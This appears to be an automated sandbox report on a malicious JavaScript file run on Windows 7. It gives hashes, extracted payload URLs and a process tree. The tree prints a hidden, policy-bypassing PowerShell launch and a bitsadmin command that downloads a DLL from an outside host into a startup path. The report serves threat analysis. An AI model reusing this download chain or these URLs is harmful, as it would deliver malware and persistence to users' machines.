Analysis
-
max time kernel
39s -
max time network
43s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
09/07/2023, 19:19
Static task
static1
Behavioral task
behavioral1
Sample
ave603jsjsjsjsjsjsjsjsjsj.js
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
ave603jsjsjsjsjsjsjsjsjsj.js
Resource
win10v2004-20230703-en
General
-
Target
ave603jsjsjsjsjsjsjsjsjsj.js
-
Size
46KB
-
MD5
734c08060ad526d0c40be2cdef4c84d4
-
SHA1
4db13fddae48543582f8975884770d5ec4b56482
-
SHA256
48a8c57895c2cfdf13a402e669a9964f56128521404e47b4727672f8ca91a90d
-
SHA512
fe00bc4d731bd2e0493a255cc0de5a1ff05aac8091ba2134c02f47e8f1ff723afbb25113d21646980952fb4991c818e29034770913d59e118ad892b2d13d443e
-
SSDEEP
768:2edhq6YG8y1GT/BibL8NmKspYMWjAtRi3i/WfCS8IFvHkgAJBFyt:jHJR1G9ibLomd6DMtRYi/jWfkgAJfyt
Malware Config
Extracted
https://virvatulishop.com/labda.zip
https://virvatulishop.com/files/
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2872 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1720 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2388 wrote to memory of 1720 2388 wscript.exe 29 PID 2388 wrote to memory of 1720 2388 wscript.exe 29 PID 2388 wrote to memory of 1720 2388 wscript.exe 29 PID 1720 wrote to memory of 2872 1720 powershell.exe 31 PID 1720 wrote to memory of 2872 1720 powershell.exe 31 PID 1720 wrote to memory of 2872 1720 powershell.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js1⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll3⤵
- Download via BitsAdmin
PID:2872
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d85c0eada7610417ac3448efa1975122
SHA10243c3ac3e03279f6abc4817906ab95d74c8c2f7
SHA2567689232c0352a14f0ff0967d88e6964eddaf25e2d282f8484fa17abb3b486a37
SHA512b3e627647589839f6383942a5db24d3b46fe0068027307eb6805e933ea481d550f8c59eab566dd9a62af1e8126efbd8416ad870da489623107415f2a8067c7d1